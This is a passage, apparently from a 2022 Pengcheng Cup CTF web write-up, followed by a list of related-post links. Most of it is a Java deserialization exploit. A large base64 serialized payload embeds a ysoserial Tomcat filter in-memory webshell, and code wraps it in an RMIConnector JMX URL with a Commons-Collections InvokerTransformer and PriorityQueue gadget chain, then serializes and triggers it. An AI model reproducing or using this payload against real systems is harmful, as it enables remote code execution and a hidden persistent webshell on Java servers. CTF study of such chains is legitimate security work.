bnB1dFN0cmVhbTsBABgoTGphdmEvaW8vSW5wdXRTdHJlYW07KVYBAAx1c2VEZWxpbWl0ZXIBACcoTGphdmEvbGFuZy9TdHJpbmc7KUxqYXZhL3V0aWwvU2Nhbm5lcjsBAAlnZXRXcml0ZXIBABcoKUxqYXZhL2lvL1ByaW50V3JpdGVyOwEAE2phdmEvaW8vUHJpbnRXcml0ZXIBAAdwcmludGxuAQAVKExqYXZhL2xhbmcvU3RyaW5nOylWAQAGZXF1YWxzAQAVKExqYXZhL2xhbmcvT2JqZWN0OylaAQAKZ2V0U2Vzc2lvbgEAIigpTGphdmF4L3NlcnZsZXQvaHR0cC9IdHRwU2Vzc2lvbjsBAANwdXQBADgoTGphdmEvbGFuZy9PYmplY3Q7TGphdmEvbGFuZy9PYmplY3Q7KUxqYXZhL2xhbmcvT2JqZWN0OwEACWdldFJlYWRlcgEAGigpTGphdmEvaW8vQnVmZmVyZWRSZWFkZXI7AQAWamF2YS9pby9CdWZmZXJlZFJlYWRlcgEACHJlYWRMaW5lAQAQZ2V0RGVjbGFyZWRGaWVsZAEALShMamF2YS9sYW5nL1N0cmluZzspTGphdmEvbGFuZy9yZWZsZWN0L0ZpZWxkOwEADXNldEFjY2Vzc2libGUBAAQoWilWAQADZ2V0AQAmKExqYXZhL2xhbmcvT2JqZWN0OylMamF2YS9sYW5nL09iamVjdDsBAA1nZXRQYXJhbWV0ZXJzAQAqKClMb3JnL2FwYWNoZS90b21jYXQvdXRpbC9odHRwL1BhcmFtZXRlcnM7AQAIZW50cnlTZXQBABEoKUxqYXZhL3V0aWwvU2V0OwEADWphdmEvdXRpbC9TZXQBABYoKUxqYXZhL3V0aWwvSXRlcmF0b3I7AQAHaGFzTmV4dAEABmdldEtleQEACnJlcGxhY2VBbGwBADgoTGphdmEvbGFuZy9TdHJpbmc7TGphdmEvbGFuZy9TdHJpbmc7KUxqYXZhL2xhbmcvU3RyaW5nOwEACGdldFZhbHVlAQAEc2l6ZQEAFShJKUxqYXZhL2xhbmcvT2JqZWN0OwEACHB1dFZhbHVlAQAnKExqYXZhL2xhbmcvU3RyaW5nO0xqYXZhL2xhbmcvT2JqZWN0OylWAQApKExqYXZhL2xhbmcvU3RyaW5nOylMamF2YXgvY3J5cHRvL0NpcGhlcjsBABcoW0JMamF2YS9sYW5nL1N0cmluZzspVgEAFyhJTGphdmEvc2VjdXJpdHkvS2V5OylWAQARamF2YS9sYW5nL0ludGVnZXIBAARUWVBFAQARZ2V0RGVjbGFyZWRNZXRob2QBAAdkb0ZpbmFsAQAGKFtCKVtCAQAQamF2YS9sYW5nL1RocmVhZAEADWN1cnJlbnRUaHJlYWQBABQoKUxqYXZhL2xhbmcvVGhyZWFkOwEAFWdldENvbnRleHRDbGFzc0xvYWRlcgEAGSgpTGphdmEvbGFuZy9DbGFzc0xvYWRlcjsBAAd2YWx1ZU9mAQAWKEkpTGphdmEvbGFuZy9JbnRlZ2VyOwEADGdldFBhcmFtZXRlcgEAKShbTGphdmEvbmV0L1VSTDtMamF2YS9sYW5nL0NsYXNzTG9hZGVyOylWAQAJc3Vic3RyaW5nAQAWKElJKUxqYXZhL2xhbmcvU3RyaW5nOwEABXdyaXRlAQALdG9CeXRlQXJyYXkBAEAoTGphdmF4L3NlcnZsZXQvU2VydmxldFJlcXVlc3Q7TGphdmF4L3NlcnZsZXQvU2VydmxldFJlc3BvbnNlOylWAQAIbmFub1RpbWUBAAMoKUoBABwoSilMamF2YS9sYW5nL1N0cmluZ0J1aWxkZXI7AQAMZ2V0UmVzb3VyY2VzAQAnKClMb3JnL2FwYWNoZS9jYXRhbGluYS9XZWJSZXNvdXJjZVJvb3Q7AQAjb3JnL2FwYWNoZS9jYXRhbGluYS9XZWJSZXNvdXJjZVJvb3QBAApnZXRDb250ZXh0AQAfKClMb3JnL2FwYWNoZS9jYXRhbGluYS9Db250ZXh0OwEADWdldFN1cGVyY2xhc3MBAAlzZXRGaWx0ZXIBABkoTGphdmF4L3NlcnZsZXQvRmlsdGVyOylWAQANc2V0RmlsdGVyTmFtZQEAB2dldE5hbWUBAA5zZXRGaWx0ZXJDbGFzcwEADGFkZEZpbHRlckRlZgEANChMb3JnL2FwYWNoZS90b21jYXQvdXRpbC9kZXNjcmlwdG9yL3dlYi9GaWx0ZXJEZWY7KVYBAA1hZGRVUkxQYXR0ZXJuAQAcamF2YXgvc2VydmxldC9EaXNwYXRjaGVyVHlwZQEAB1JFUVVFU1QBAB5MamF2YXgvc2VydmxldC9EaXNw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";RMIConnector rmiConnector=new RMIConnector(new JMXServiceURL("service:jmx:rmi://localhost:9999/stub/"+exp),map);final InvokerTransformer transformer = new InvokerTransformer("toString", new Class[0], new Object[0]);final PriorityQueue<Object> queue = new PriorityQueue<Object>(2,new TransformingComparator(transformer));queue.add(1);queue.add(1);Reflections.setFieldValue(transformer, "iMethodName", "connect");final Object[] queueArray = (Object[]) Reflections.getFieldValue(queue, "queue");queueArray[0] = rmiConnector;queueArray[1] = 1;ByteArrayOutputStream ser = new ByteArrayOutputStream();ObjectOutputStream oser = new ObjectOutputStream(ser);oser.writeObject(queue);oser.close();System.out.println(ser);System.out.println(Base64.getEncoder().encodeToString(ser.toByteArray()));new ObjectInputStream(new ByteArrayInputStream(Base64.getDecoder().decode(Base64.getEncoder().encodeToString(ser.toByteArray())))).readObject();}
}
2022鹏城杯web相关推荐
- 2022鹏城杯CTF---Crypto
easy_rsa 加密脚本: import gmpy2 from Crypto.Util.number import * import random from secret import flagm1 ...
- 【蓝桥杯Web】2022年第十三届蓝桥杯Web大学组国赛真题解析
前言 省赛真题解析见: 2022年第十三届蓝桥杯Web大学组省赛真题解析(完整版) 2022年第十三届蓝桥杯Web大学组省赛真题解析(精华版) 更多蓝桥杯题解请查阅专栏:蓝桥杯 之前写省赛解析时篇幅过 ...
- 2022春秋杯-春季赛 勇者山峰 writeup(misc全部+web签到)
2022春秋杯-春季赛 勇者山峰 writeup(misc全部+web签到) 改改比赛wp发上来 本文来自csdn的⭐️shu天⭐️,平时会记录ctf.取证和渗透相关的文章,欢迎大家来我的主页:shu ...
- 2022长安杯复盘——lucid凡
2022长安杯案情背景:某地警方接到受害人报案称其在某虚拟币交易网站遭遇诈骗,该网站号称使用"USTD币"购买所谓的"HT币",受害人充值后不但 "H ...
- 2022春秋杯联赛 传说殿堂赛道 sql_debug题目解析
2022春秋杯联赛 传说殿堂赛道 sql_debug题目解析 前言 sql_debug sql_debug 题⽬介绍 dsn_from_uri 触发phar反序列化 Linux下PHP内核调试⼩知识 ...
- 2022长安杯-wp
2022长安杯案情背景:某地警方接到受害人报案称其在某虚拟币交易网站遭遇诈骗,该网站号称使用"USTD币"购买所谓的"HT币",受害人充值后不但 "H ...
- 2022美亚杯第八届中国电子数据取证大赛-个人赛write up详解,软件就用弘连和美亚,尽量写的细致一点。建议入门看,仅为了解题,没有专业精神。专业选手去看后面推荐的两篇解析,都是大佬。
建议新手看我的博客,比较简单粗暴,解题率较低,仅仅是为了比赛,入门的同学可以看看.我的水平还很糟糕,之后会努力学习,所以这篇博客也会不断修改完善.博客还有很多不当之处,如有发现不当之处请私信我,我会做 ...
- 2022长安杯的网站重构及部分题解
这里只对2022长安杯的网站重构过程进行记录 首先看检材一里的历史命令 这里只截取部分 从历史命令可以看出,他执行了很多次start_web.sh和npm run dev 且这个网站的服务就是用那几个 ...
- 【2022羊城杯WriteUp By EDISEC】
2022羊城杯WriteUp By EDISEC Web little_db Safepop rce_me step_by_step-v3 ComeAndLogin simple_json Misc ...
最新文章
- Google Colab——用谷歌免费GPU跑你的深度学习代码
- STM32H7的Cache和MPU
- linux通信机制总结
- 饼状图改变数据显示位置_这么用MatPlotLib视觉化呈现数据,你值得拥有
- SaaS市场普及 网络推广策略最有效
- 知乎:GAN 的发展对于研究通用人工智能有什么意义?
- ARC079F - Namori Grundy(构造,基环树)
- c语言自动计算时间,C语言 · 计算时间
- windows配置本地端口映射到其它电脑
- C语言数据结构、十字链表的分析及实现
- [译] 用行为经济学来传达付费应用订阅的价值
- 各自然带代表植被_十种常见自然带所对应的植被
- iPhone/iPad解锁屏幕密码
- 计算机网络---通过DNS服务器查询Web服务器的IP地址
- flash as3_vinson_01:绘制扇形
- AD 删除原理图图纸外的器件
- HD2500显卡驱动linux,Intel HD Graphics 2500/4000驱动免费版
- 川大计算机差额复试比例,四川大学研究生复试比例
- 常见排序算法(C语言实现)
- 与智者同行,你会不同凡响;与高人为伍,你能登上巅峰